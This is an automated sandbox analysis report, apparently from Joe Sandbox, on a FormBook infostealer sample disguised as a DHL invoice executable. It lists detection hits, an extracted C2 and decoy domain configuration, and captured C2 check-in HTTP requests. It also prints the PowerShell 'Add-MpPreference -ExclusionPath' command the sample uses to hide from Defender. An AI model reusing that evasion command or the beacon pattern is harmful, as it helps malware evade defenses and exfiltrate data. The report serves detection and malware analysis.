Electronica Pendiente documento No 04BB25083.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe, ProcessId: 7740, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe, ParentImage: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe, ParentProcessId: 7472, ParentProcessName: DHL Factura Electronica Pendiente documento No 04BB25083.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe, ProcessId: 7740, ProcessName: powershell.exe

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 103.224.212.213

Timestamp:	02/21/24-14:37:39.569984
SID:	2031412
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 103.167.199.20

Timestamp:	02/21/24-14:38:01.164210
SID:	2031412
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 3.33.130.190

Timestamp:	02/21/24-14:34:54.459744
SID:	2031412
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 91.195.240.117

Timestamp:	02/21/24-14:37:19.115942
SID:	2031412
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 15.197.142.173

Timestamp:	02/21/24-14:35:55.287926
SID:	2031412
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 34.149.87.45

Timestamp:	02/21/24-14:35:13.479776
SID:	2031412
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.permanentday.space	Avira URL Cloud: Label: malware
Source: http://www.aloyoga-uae.com/pz08/	Avira URL Cloud: Label: phishing
Source: http://www.phdop.xyz/pz08/www.quickfibrokers.com	Avira URL Cloud: Label: phishing
Source: http://www.ae-skinlab.com/pz08/	Avira URL Cloud: Label: malware
Source: http://www.itkagear.com/pz08/www.jenstandsforarkansas.com	Avira URL Cloud: Label: malware
Source: http://www.itkagear.com/pz08/	Avira URL Cloud: Label: malware
Source: http://www.quickfibrokers.com/pz08/	Avira URL Cloud: Label: malware
Source: http://www.bigtexture.xyz/pz08/www.baerana.com	Avira URL Cloud: Label: phishing
Source: http://www.quickfibrokers.com/pz08/?Ap=FGzpPczua9V5Fhp0KyeSYZEXQ8ThSiWTqmgy8xu2EJQTOQiKwoJBowNtdQHJGs6scj9G&N6Ahw=3ffl2F0Punah42	Avira URL Cloud: Label: malware
Source: http://www.bigtexture.xyz/pz08/	Avira URL Cloud: Label: phishing
Source: http://www.c2help.live/pz08/	Avira URL Cloud: Label: malware
Source: http://www.permanentday.space/pz08/www.usetruerreview.com	Avira URL Cloud: Label: malware
Source: http://www.quickfibrokers.com	Avira URL Cloud: Label: malware
Source: http://www.quickfibrokers.com/pz08/www.permanentday.space	Avira URL Cloud: Label: malware
Source: http://www.permanentday.space/pz08/	Avira URL Cloud: Label: malware
Source: http://www.ae-skinlab.com/pz08/?Ap=2oeA2CX1Q61jX45FJrFMqJgZRjY3h4s6VR+9nrWXkdAg0YO+UupxHOYJVxDLCxYuKaEo&N6Ahw=3ffl2F0Punah42	Avira URL Cloud: Label: malware
Source: http://www.c2help.live/pz08/www.papermoonnursery.com	Avira URL Cloud: Label: malware
Source: http://www.c2help.live	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.rdlva.com/pz08/"], "decoy": ["deespresence.com", "fanyablack.com", "papermoonnursery.com", "sunriseclohting.store", "jenstandsforarkansas.com", "lkhtalentconsulting.com", "baerana.com", "hyperphit.com", "davidianbrant.com", "itkagear.com", "web-findmy.site", "liveforwardventures.com", "skyenglearn.online", "studio-sticky.store", "yassa-hany.online", "tacoshack479.com", "bigtexture.xyz", "erxkula.shop", "go-bloggers.com", "qwdlwys.site", "taylorpritchett.com", "yobo-by.com", "trendsdrop.com", "boostyourselftoday.com", "taxibactrungnam.com", "sgzycp.net", "anti-theft-device-82641.bond", "ytytyt016.xyz", "loveyourhome.style", "ithinkmoney.com", "bertric.info", "permanentday.space", "kxn.ink", "onlythumbs.online", "techrihno.com", "washing-machine-46612.bond", "phdop.xyz", "nordens-media.com", "gourmetfoodfactory.com", "ketoalycetiworks.buzz", "amplilim.site", "usetruerreview.com", "inprime.xyz", "aloyoga-uae.com", "quickfibrokers.com", "primadesignerhomes.com", "greatlifehacks.online", "thewipglobal.com", "tobegoodlife.net", "hotelfincamalvasia.com", "trevts.com", "ae-skinlab.com", "grammarhome.com", "cld005.com", "first-solution.online", "keylabcerrajeria.com", "besttravelsgate.com", "friskiwear.com", "hedrickmanufactory.com", "pinewell.world", "5819995.com", "c2help.live", "kai3.center", "plantasdasminas.com"]}

Multi AV Scanner detection for domain / URL

Source: quickfibrokers.com	Virustotal: Detection: 5%			Perma Link
Source: http://www.aloyoga-uae.com/pz08/	Virustotal: Detection: 10%			Perma Link

Multi AV Scanner detection for submitted file

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe	ReversingLabs: Detection: 34%
Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe	Virustotal: Detection: 40%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Joe Sandbox ML: detected

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: systray.pdb source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532295892.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532450254.0000000001810000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000007.00000002.3884035219.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdbGCTL source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532295892.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532450254.0000000001810000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000007.00000002.3884035219.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000007.00000003.1532523813.000000000492E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000007.00000003.1534349784.0000000004AD2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000007.00000003.1532523813.000000000492E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000007.00000003.1534349784.0000000004AD2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 4x nop then pop esi		5_2_00417312
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop esi		7_2_02D17312

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49714 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49716 -> 34.149.87.45:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49720 -> 15.197.142.173:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49721 -> 91.195.240.117:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49722 -> 103.224.212.213:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49723 -> 103.167.199.20:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.rdlva.com/pz08/

Performs DNS queries to domains with low reputation

Source:

DNS query: www.bigtexture.xyz

Source: global traffic	HTTP traffic detected: GET /pz08/?N6Ahw=3ffl2F0Punah42&Ap=sHUCYmOOLAoNE4y8/5cjc5MBwdY8WEAoN/4wEGeHNPnX/dfJjUbL6GitjMlkSkRNL9P+ HTTP/1.1Host: www.rdlva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?Ap=2oeA2CX1Q61jX45FJrFMqJgZRjY3h4s6VR+9nrWXkdAg0YO+UupxHOYJVxDLCxYuKaEo&N6Ahw=3ffl2F0Punah42 HTTP/1.1Host: www.ae-skinlab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?Ap=FGzpPczua9V5Fhp0KyeSYZEXQ8ThSiWTqmgy8xu2EJQTOQiKwoJBowNtdQHJGs6scj9G&N6Ahw=3ffl2F0Punah42 HTTP/1.1Host: www.quickfibrokers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?Ap=iUtqEraofiOoamAGmz9y1BZqdP67NXRhW/u/s4hsis3XwB7pF+A9OlO8MXjIW5A/mozx&N6Ahw=3ffl2F0Punah42 HTTP/1.1Host: www.baerana.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR HTTP/1.1Host: www.yassa-hany.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?Ap=bKUMdxsXbZ20XGxWaFGGS8S5qdUvksLLWvMweKpTgT2MARQxqrmnXGgSr/TayxAxMgg2&N6Ahw=3ffl2F0Punah42 HTTP/1.1Host: www.taxibactrungnam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 91.195.240.117 91.195.240.117
Source: Joe Sandbox View	IP Address: 103.224.212.213 103.224.212.213
Source: Joe Sandbox View	IP Address: 15.197.142.173 15.197.142.173

Source: Joe Sandbox View	ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS
Source: Joe Sandbox View	ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 6_2_0E071F82 getaddrinfo,setsockopt,recv,

6_2_0E071F82

Source: global traffic	HTTP traffic detected: GET /pz08/?N6Ahw=3ffl2F0Punah42&Ap=sHUCYmOOLAoNE4y8/5cjc5MBwdY8WEAoN/4wEGeHNPnX/dfJjUbL6GitjMlkSkRNL9P+ HTTP/1.1Host: www.rdlva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?Ap=2oeA2CX1Q61jX45FJrFMqJgZRjY3h4s6VR+9nrWXkdAg0YO+UupxHOYJVxDLCxYuKaEo&N6Ahw=3ffl2F0Punah42 HTTP/1.1Host: www.ae-skinlab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?Ap=FGzpPczua9V5Fhp0KyeSYZEXQ8ThSiWTqmgy8xu2EJQTOQiKwoJBowNtdQHJGs6scj9G&N6Ahw=3ffl2F0Punah42 HTTP/1.1Host: www.quickfibrokers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?Ap=iUtqEraofiOoamAGmz9y1BZqdP67NXRhW/u/s4hsis3XwB7pF+A9OlO8MXjIW5A/mozx&N6Ahw=3ffl2F0Punah42 HTTP/1.1Host: www.baerana.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR HTTP/1.1Host: www.yassa-hany.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pz08/?Ap=bKUMdxsXbZ20XGxWaFGGS8S5qdUvksLLWvMweKpTgT2MARQxqrmnXGgSr/TayxAxMgg2&N6Ahw=3ffl2F0Punah42 HTTP/1.1Host: www.taxibactrungnam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.rdlva.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Wed, 21 Feb 2024 13:35:55 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 21 Feb 2024 13:38:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: explorer.exe, 00000006.00000000.1481090991.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.000000000921D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009220000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000006.00000000.1481090991.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.000000000921D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009220000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000000.1481090991.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.000000000921D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009220000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000006.00000002.3901744709.0000000010E5F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000007.00000002.3885851208.00000000056BF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://img.sedoparking.com
Source: explorer.exe, 00000006.00000000.1476006897.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3886674045.0000000004405000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000006.00000000.1481090991.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.000000000921D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009220000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000002.3890474944.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000006.00000002.3889073866.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1473566211.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1479452391.0000000007710000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000000.00000002.1467009069.0000000002A23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ae-skinlab.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ae-skinlab.com/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ae-skinlab.com/pz08/www.phdop.xyz
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ae-skinlab.comReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aloyoga-uae.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aloyoga-uae.com/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aloyoga-uae.comReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anti-theft-device-82641.bond
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anti-theft-device-82641.bond/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anti-theft-device-82641.bond/pz08/www.itkagear.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.anti-theft-device-82641.bondReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.baerana.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.baerana.com/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.baerana.com/pz08/www.yassa-hany.online
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.baerana.comReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bigtexture.xyz
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bigtexture.xyz/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bigtexture.xyz/pz08/www.baerana.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bigtexture.xyzReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.c2help.live
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.c2help.live/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.c2help.live/pz08/www.papermoonnursery.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.c2help.liveReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.itkagear.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.itkagear.com/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.itkagear.com/pz08/www.jenstandsforarkansas.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.itkagear.comReferer:
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jenstandsforarkansas.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jenstandsforarkansas.com/pz08/
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jenstandsforarkansas.com/pz08/www.aloyoga-uae.com
Source: explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jenstandsforarkansas.comReferer:
